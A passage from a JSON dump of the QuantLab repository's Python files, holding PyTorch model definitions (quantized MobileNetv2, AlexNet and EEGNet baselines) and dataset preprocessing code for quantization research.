bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = activ()\n self.phi11_conv = conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = activ()\n self.phi12_conv = conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi12_act = activ()\n self.phi13_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = activ()\n self.phi14_conv = conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = activ()\n self.phi15_conv = conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi15_act = activ()\n self.phi16_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = activ()\n self.phi17_conv = conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = activ()\n self.phi18_conv = conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = activ()\n self.phi20_conv = conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = activ()\n self.phi21_conv = conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi21_act = activ()\n self.phi22_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = activ()\n self.phi23_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = activ()\n self.phi24_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi24_act = activ()\n self.phi25_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = activ()\n self.phi26_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = activ()\n self.phi27_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi27_act = activ()\n self.phi28_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = activ()\n self.phi29_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = activ()\n self.phi30_conv = conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = activ()\n self.phi32_conv = conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = activ()\n self.phi33_conv = conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi33_act = activ()\n self.phi34_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = activ()\n self.phi35_conv = conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = nn.BatchNorm2d(t5)\n self.phi35_act = activ()\n self.phi36_conv = conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi36_act = activ()\n self.phi37_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = activ()\n self.phi38_conv = conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = activ()\n self.phi39_conv = conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = activ()\n self.phi41_conv = conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = activ()\n self.phi42_conv = conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi42_act = activ()\n self.phi43_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = activ()\n self.phi44_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = activ()\n self.phi45_conv = conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi45_act = activ()\n self.phi46_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = activ()\n self.phi47_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = activ()\n self.phi48_conv = conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = activ()\n self.phi50_conv = conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = activ()\n self.phi51_conv = conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = activ()\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n \n assert(quantSkipLastLayer)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n \n if pretrained: \n self.loadPretrainedTorchVision()\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, INQConv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear) or isinstance(m, INQLinear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def loadPretrainedTorchVision(self):\n import torchvision as tv\n modelRef = tv.models.mobilenet_v2(pretrained=True)\n stateDictRef = modelRef.state_dict()\n remapping = {'features.0.0': 'phi01_conv',\n 'features.0.1': 'phi01_bn',\n 'features.1.conv.0.0': 'phi02_conv',\n 'features.1.conv.0.1': 'phi02_bn',\n 'features.1.conv.1': 'phi03_conv',\n 'features.1.conv.2': 'phi03_bn',\n }\n \n for i, layerBlock in enumerate(range(2,17+1)):\n offset = 3*i + 4\n rExt = {'features.%d.conv.0.0' % (layerBlock,) : 'phi%02d_conv' % (offset+0,),\n 'features.%d.conv.0.1' % (layerBlock,) : 'phi%02d_bn' % (offset+0,),\n 'features.%d.conv.1.0' % (layerBlock,) : 'phi%02d_conv' % (offset+1,),\n 'features.%d.conv.1.1' % (layerBlock,) : 'phi%02d_bn' % (offset+1,),\n 'features.%d.conv.2' % (layerBlock,) : 'phi%02d_conv' % (offset+2,),\n 'features.%d.conv.3' % (layerBlock,) : 'phi%02d_bn' % (offset+2,),\n }\n remapping.update(rExt)\n rExt = {'features.18.0': 'phi52_conv', \n 'features.18.1': 'phi52_bn',\n 'classifier.1': 'phi53_fc'\n }\n remapping.update(rExt)\n \n stateDictRefMapped = {ksd.replace(kremap, vremap): vsd \n for ksd, vsd in stateDictRef.items()\n for kremap, vremap in remapping.items()\n if ksd.startswith(kremap)}\n \n missingFields = {k: v \n for k,v in self.state_dict().items() \n if k not in stateDictRefMapped}\n assert(len([k \n for k in missingFields.keys()\n if not (k.endswith('.sParam') or \n k.endswith('.weightFrozen'))\n ]) == 0) # assert only INQ-specific fields missing\n \n stateDictRefMapped.update(missingFields)\n self.load_state_dict(stateDictRefMapped, strict=True)\n \nif __name__ == '__main__':\n model = MobileNetv2QuantWeight(quantAct=False, quantWeights=True, \n weightInqSchedule={}, \n weightInqLevels=3, \n weightInqStrategy=\"magnitude-SRQ\", \n weightInqQuantInit='uniform-perCh-l2opt',\n quantSkipFirstLayer=True,\n quantSkipLastLayer=True, \n pretrained=True)\n \n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5122554898262024, "alphanum_fraction": 0.553602397441864, "avg_line_length": 34.74336242675781, "blob_id": "460048c6208bbb4f179499fea64940102c539e89", "content_id": "5af0f58d3e8d6814ef031d429aca409703c01af6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4039, "license_type": "permissive", "max_line_length": 91, "num_lines": 113, "path": "/quantlab/ImageNet/AlexNet/alexnetbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"AlexNetBaseline\",\n# \"params\": {\"capacity\": 1},\n# \"pretrained\": null,\n# \"loss_fn\": {\n# \"class\": \"CrossEntropyLoss\",\n# \"params\": {}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"AlexNetBaseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass AlexNetBaseline(nn.Module):\n \"\"\"AlexNet Convolutional Neural Network.\"\"\"\n def __init__(self, capacity):\n super().__init__()\n c0 = 3\n c1 = int(64 * capacity)\n c2 = int(64 * 3 * capacity)\n c3 = int(64 * 6 * capacity)\n c4 = int(64 * 4 * capacity)\n c5 = 256\n nh = 4096\n # convolutional layers\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=11, stride=4, padding=2, bias=False)\n self.phi1_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = nn.ReLU6()\n self.phi2_conv = nn.Conv2d(c1, c2, kernel_size=5, padding=2, bias=False)\n self.phi2_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c2)\n self.phi2_act = nn.ReLU6()\n self.phi3_conv = nn.Conv2d(c2, c3, kernel_size=3, padding=1, bias=False)\n self.phi3_bn = nn.BatchNorm2d(c3)\n self.phi3_act = nn.ReLU6()\n self.phi4_conv = nn.Conv2d(c3, c4, kernel_size=3, padding=1, bias=False)\n self.phi4_bn = nn.BatchNorm2d(c4)\n self.phi4_act = nn.ReLU6()\n self.phi5_conv = nn.Conv2d(c4, c5, kernel_size=3, padding=1, bias=False)\n self.phi5_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi5_bn = nn.BatchNorm2d(c5)\n self.phi5_act = nn.ReLU6()\n # fully connected layers\n self.phi6_fc = nn.Linear(c5 * 6 * 6, nh, bias=False)\n self.phi6_bn = nn.BatchNorm1d(nh)\n self.phi6_act = nn.ReLU6()\n self.phi7_fc = nn.Linear(nh, nh, bias=False)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = nn.ReLU6()\n self.phi8_fc = nn.Linear(nh, 1000)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_mp(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_mp(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = x.view(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = self.phi6_fc(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi2_conv_w', self.phi2_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi4_conv_w', self.phi4_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi6_fc_w', self.phi6_fc.weight.data))\n stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 29, "blob_id": "07379877bf4c703076ce28e3ed7a1be685186f63", "content_id": "c7b3659ea7de40f09e25a6a775a504960c640b48", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "permissive", "max_line_length": 29, "num_lines": 1, "path": "/quantlab/ImageNet/ResNet/postprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../MobileNetv2/postprocess.py" }, { "alpha_fraction": 0.5848419070243835, "alphanum_fraction": 0.5899106860160828, "avg_line_length": 36.32432556152344, "blob_id": "4c0e167e07b30ebeb6c2eee617daf6c1983790aa", "content_id": "546564b6e4aad077e81a6df7aa5655e726342995", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4143, "license_type": "permissive", "max_line_length": 127, "num_lines": 111, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torchvision as tv\nimport pickle\nimport os\nimport numpy as np\nimport torch\n\nclass PickleDictionaryNumpyDataset(tv.datasets.VisionDataset):\n \"\"\"Looks for a train.pickle or test.pickle file within root. The file has \n to contain a dictionary with classes as keys and a numpy array with the \n data. First dimension of the numpy array is the sample index. \n \n Args:\n root (string): Root directory path.\n train (bool, default=True): defines whether to load the train or test set. \n transform (callable, optional): A function/transform that takes in\n a sample and returns a transformed version.\n E.g, ``transforms.RandomCrop`` for images.\n target_transform (callable, optional): A function/transform that takes\n in the target and transforms it.\n Attributes:\n classes (list): List of the class names.\n class_to_idx (dict): Dict with items (class_name, class_index).\n data (numpy array): All the data samples. First dim are different samples.\n targets (list): The class_index value for each image in the dataset.\n \"\"\"\n\n def __init__(self, root, train=True, transform=None, target_transform=None):\n super().__init__(root, transform=transform, \n target_transform=target_transform)\n \n self.train = train # training set or test set\n \n if self.train: \n path = os.path.join(root, 'train.pickle')\n else: \n path = os.path.join(root, 'test.pickle')\n \n with open(path, 'rb') as f:\n dataset = pickle.load(f)\n dataset = dataset.items()\n \n self.classes = [k for k, v in dataset] # assume: train set contains all classes\n self.classes.sort()\n self.class_to_idx = {cl: i for i, cl in enumerate(self.classes)}\n \n self.data = np.stack([v[i] for k, v in dataset for i in range(len(v))], axis=0) #np.concatenate(list(dataset.values()))\n \n self.targets = [self.class_to_idx[k] \n for k, v in dataset \n for i in range(len(v))]\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n sample = self.data[index]\n target = self.targets[index]\n \n if self.transform is not None:\n sample = self.transform(sample) # note: dimensionaility here is atypical (not 3 dims, only 2)\n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return torch.from_numpy(sample).float().mul(1/2**15).unsqueeze(0).contiguous(), target\n\n def __len__(self):\n return len(self.data)\n\n\ndef _get_transforms(augment):\n assert(augment == False)\n # normMean = tuple([0]*64)\n # normStddev = tuple([2**16/2]*64)\n\n # train_t = tv.transforms.Compose([\n # tv.transforms.ToTensor(),\n # tv.transforms.Normalize(mean=normMean, std=normStddev)])\n # valid_t = tv.transforms.Compose([\n # tv.transforms.ToTensor(),\n # tv.transforms.Normalize(mean=normMean, std=normStddev)])\n # train_t = tv.transforms.Compose([tv.transforms.ToTensor()])\n # valid_t = tv.transforms.Compose([tv.transforms.ToTensor()])\n train_t = None\n valid_t = None\n \n if not augment:\n train_t = valid_t\n transforms = {\n 'training': train_t,\n 'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n \n augment = data_config['augment']\n \n transforms = _get_transforms(augment)\n \n trainset = PickleDictionaryNumpyDataset(dir_data, train=True, \n transform=transforms['training'])\n validset = PickleDictionaryNumpyDataset(dir_data, train=False, \n transform=transforms['validation'])\n\n return trainset, validset, None\n" }, { "alpha_fraction": 0.5056570768356323, "alphanum_fraction": 0.5282854437828064, "avg_line_length": 42.358489990234375, "blob_id": "a1cf4d3acc6cf1a588cc5b0d2a96a98b1d6cc51d", "content_id": "c859359317abbf7058036786ccde3721db7150c6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2298, "license_type": "permissive", "max_line_length": 105, "num_lines": 53, "path": "/quantlab/CIFAR-10/VGG/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torchvision\nfrom torchvision.transforms import RandomCrop, RandomHorizontalFlip, ToTensor, Normalize, Compose\n\nfrom quantlab.treat.data.split import transform_random_split\n\n\n_CIFAR10 = {\n 'Normalize': {\n 'mean': (0.4914, 0.4822, 0.4465),\n 'std': (0.2470, 0.2430, 0.2610)\n }\n}\n\n\ndef get_transforms(augment):\n train_t = Compose([RandomCrop(32, padding=4),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_CIFAR10['Normalize'])])\n valid_t = Compose([ToTensor(),\n Normalize(**_CIFAR10['Normalize'])])\n if not augment:\n train_t = valid_t\n transforms = {\n 'training': train_t,\n 'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n transforms = get_transforms(data_config['augment'])\n trainvalid_set = torchvision.datasets.CIFAR10(root=dir_data, train=True, download=True)\n if 'useTestForVal' in data_config.keys() and data_config['useTestForVal'] == True:\n train_set, valid_set = transform_random_split(trainvalid_set, \n [len(trainvalid_set), 0],\n [transforms['training'], transforms['validation']])\n test_set = torchvision.datasets.CIFAR10(root=dir_data, train=False, \n download=True, \n transform=transforms['validation'])\n valid_set = test_set\n print('using test set for validation.')\n else:\n len_train = int(len(trainvalid_set) * (1.0 - data_config['valid_fraction']))\n train_set, valid_set = transform_random_split(trainvalid_set, \n [len_train, len(trainvalid_set) - len_train],\n [transforms['training'], transforms['validation']])\n test_set = torchvision.datasets.CIFAR10(root=dir_data, train=False, \n download=True, \n transform=transforms['validation'])\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.5035090446472168, "alphanum_fraction": 0.5347170233726501, "avg_line_length": 33.88020706176758, "blob_id": "a6503b7c5e1546357fd2c8e0ed1a051d6ec71f47", "content_id": "a9f7078d884f7aa9af1cc148a787a002dbdf3e1a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6697, "license_type": "permissive", "max_line_length": 101, "num_lines": 192, "path": "/quantlab/BCI-CompIV-2a/EEGNet/eegnetbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Tibor Schneider\n\nimport numpy as np\nimport torch as t\nimport torch.nn.functional as F\n\n\nclass EEGNetBaseline(t.nn.Module):\n \"\"\"\n EEGNet\n\n In order for the baseline to be launched with the same logic as the quantized models, an empty\n quantization scheme and an empty thermostat schedule needs to be configured.\n Use the following templates for the 'net' and 'thermostat' configurations (for the \"net\" object,\n all params can be omitted to use the default ones):\n\n \"net\": {\n \"class\": \"EEGNetBaseline\",\n \"params\": {\n \"F1\": 8,\n \"D\": 2,\n \"F2\": 16,\n \"C\": 22,\n \"T\": 1125,\n \"N\": 4,\n \"p_dropout\": 0.5,\n \"activation\": \"relu\",\n \"dropout_type\": \"TimeDropout2D\",\n },\n \"pretrained\": null,\n \"loss_fn\": {\n \"class\": \"CrossEntropyLoss\",\n \"params\": {}\n }\n }\n\n \"thermostat\": {\n \"class\": \"EEGNetBaseline\",\n \"params\": {\n \"noise_schemes\": {},\n \"bindings\": []\n }\n }\n \"\"\"\n\n def __init__(self, F1=8, D=2, F2=None, C=22, T=1125, N=4, p_dropout=0.5, activation='relu',\n dropout_type='TimeDropout2D'):\n \"\"\"\n F1: Number of spectral filters\n D: Number of spacial filters (per spectral filter), F2 = F1 * D\n F2: Number or None. If None, then F2 = F1 * D\n C: Number of EEG channels\n T: Number of time samples\n N: Number of classes\n p_dropout: Dropout Probability\n activation: string, either 'elu' or 'relu'\n dropout_type: string, either 'dropout', 'SpatialDropout2d' or 'TimeDropout2D'\n \"\"\"\n super(EEGNetBaseline, self).__init__()\n\n # prepare network constants\n if F2 is None:\n F2 = F1 * D\n\n # check the activation input\n activation = activation.lower()\n assert activation in ['elu', 'relu']\n\n # Prepare Dropout Type\n if dropout_type.lower() == 'dropout':\n dropout = t.nn.Dropout\n elif dropout_type.lower() == 'spatialdropout2d':\n dropout = t.nn.Dropout2d\n elif dropout_type.lower() == 'timedropout2d':\n dropout = TimeDropout2d\n else:\n raise ValueError(\"dropout_type must be one of SpatialDropout2d, Dropout or \"\n \"WrongDropout2d\")\n\n # store local values\n self.F1, self.D, self.F2, self.C, self.T, self.N = (F1, D, F2, C, T, N)\n self.p_dropout, self.activation = (p_dropout, activation)\n\n # Number of input neurons to the final fully connected layer\n n_features = (T // 8) // 8\n\n # Block 1\n self.conv1_pad = t.nn.ZeroPad2d((31, 32, 0, 0))\n self.conv1 = t.nn.Conv2d(1, F1, (1, 64), bias=False)\n self.batch_norm1 = t.nn.BatchNorm2d(F1, momentum=0.01, eps=0.001)\n self.conv2 = t.nn.Conv2d(F1, D * F1, (C, 1), groups=F1, bias=False)\n self.batch_norm2 = t.nn.BatchNorm2d(D * F1, momentum=0.01, eps=0.001)\n self.activation1 = t.nn.ELU(inplace=True) if activation == 'elu' else t.nn.ReLU(inplace=True)\n self.pool1 = t.nn.AvgPool2d((1, 8))\n # self.dropout1 = dropout(p=p_dropout)\n self.dropout1 = t.nn.Dropout(p=p_dropout)\n\n # Block 2\n self.sep_conv_pad = t.nn.ZeroPad2d((7, 8, 0, 0))\n self.sep_conv1 = t.nn.Conv2d(D * F1, D * F1, (1, 16), groups=D * F1, bias=False)\n self.sep_conv2 = t.nn.Conv2d(D * F1, F2, (1, 1), bias=False)\n self.batch_norm3 = t.nn.BatchNorm2d(F2, momentum=0.01, eps=0.001)\n self.activation2 = t.nn.ELU(inplace=True) if activation == 'elu' else t.nn.ReLU(inplace=True)\n self.pool2 = t.nn.AvgPool2d((1, 8))\n self.dropout2 = dropout(p=p_dropout)\n\n # Fully connected layer (classifier)\n self.flatten = Flatten()\n self.fc = t.nn.Linear(F2 * n_features, N, bias=True)\n\n # initialize weights\n self._initialize_params()\n\n def forward(self, x, with_stats=False):\n\n # input dimensions: (s, 1, C, T)\n\n # Block 1\n x = self.conv1_pad(x)\n x = self.conv1(x) # output dim: (s, F1, C, T-1)\n x = self.batch_norm1(x)\n x = self.conv2(x) # output dim: (s, D * F1, 1, T-1)\n x = self.batch_norm2(x)\n x = self.activation1(x)\n x = self.pool1(x) # output dim: (s, D * F1, 1, T // 8)\n x = self.dropout1(x)\n\n # Block2\n x = self.sep_conv_pad(x)\n x = self.sep_conv1(x) # output dim: (s, D * F1, 1, T // 8 - 1)\n x = self.sep_conv2(x) # output dim: (s, F2, 1, T // 8 - 1)\n x = self.batch_norm3(x)\n x = self.activation2(x)\n x = self.pool2(x) # output dim: (s, F2, 1, T // 64)\n x = self.dropout2(x)\n\n # Classification\n x = self.flatten(x) # output dim: (s, F2 * (T // 64))\n x = self.fc(x) # output dim: (s, N)\n\n if with_stats:\n stats = [('conv1_w', self.conv1.weight.data),\n ('conv2_w', self.conv2.weight.data),\n ('sep_conv1_w', self.sep_conv1.weight.data),\n ('sep_conv2_w', self.sep_conv2.weight.data),\n ('fc_w', self.fc.weight.data),\n ('fc_b', self.fc.bias.data)]\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n return self.forward(x, with_stats=True)\n\n def _initialize_params(self, weight_init=t.nn.init.xavier_uniform_, bias_init=t.nn.init.zeros_):\n \"\"\"\n Initializes all the parameters of the model\n\n Parameters:\n - weight_init: t.nn.init inplace function\n - bias_init: t.nn.init inplace function\n\n \"\"\"\n def init_weight(m):\n if isinstance(m, t.nn.Conv2d) or isinstance(m, t.nn.Linear):\n weight_init(m.weight)\n if isinstance(m, t.nn.Linear):\n bias_init(m.bias)\n\n self.apply(init_weight)\n\n\nclass TimeDropout2d(t.nn.Dropout2d):\n \"\"\"\n Dropout layer, where the last dimension is treated as channels\n \"\"\"\n def __init__(self, p=0.5, inplace=False):\n \"\"\"\n See t.nn.Dropout2d for parameters\n \"\"\"\n super(TimeDropout2d, self).__init__(p=p, inplace=inplace)\n\n def forward(self, input):\n if self.training:\n input = input.permute(0, 3, 1, 2)\n input = F.dropout2d(input, self.p, True, self.inplace)\n input = input.permute(0, 2, 3, 1)\n return input\n\n\nclass Flatten(t.nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 29, "blob_id": "cbd95fb5f7b977f9eb12ffa4fb523c2ba9424fcb", "content_id": "fadf329eaec9905402517ab81f03fb437cfe9ba1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "permissive", "max_line_length": 29, "num_lines": 1, "path": "/quantlab/ETHZ-CVL-AED/utils/meter.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../../CIFAR-10/utils/meter.py" }, { "alpha_fraction": 0.5578778982162476, "alphanum_fraction": 0.6198146343231201, "avg_line_length": 61.08333206176758, "blob_id": "ef61aa5efd1b20fc1172fe7dee28eb914a67937b", "content_id": "f31bef75743d2912b083314f7b7c715b4a94e135", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15645, "license_type": "permissive", "max_line_length": 139, "num_lines": 252, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2residuals.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\nfrom quantlab.ImageNet.MobileNetv2.mobilenetv2baseline import MobileNetv2Baseline\n\nclass MobileNetv2Residuals(MobileNetv2Baseline):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6, quant_schemes=None, \n quantAct=True, quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=2, weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False):\n \n super().__init__(capacity, expansion)\n 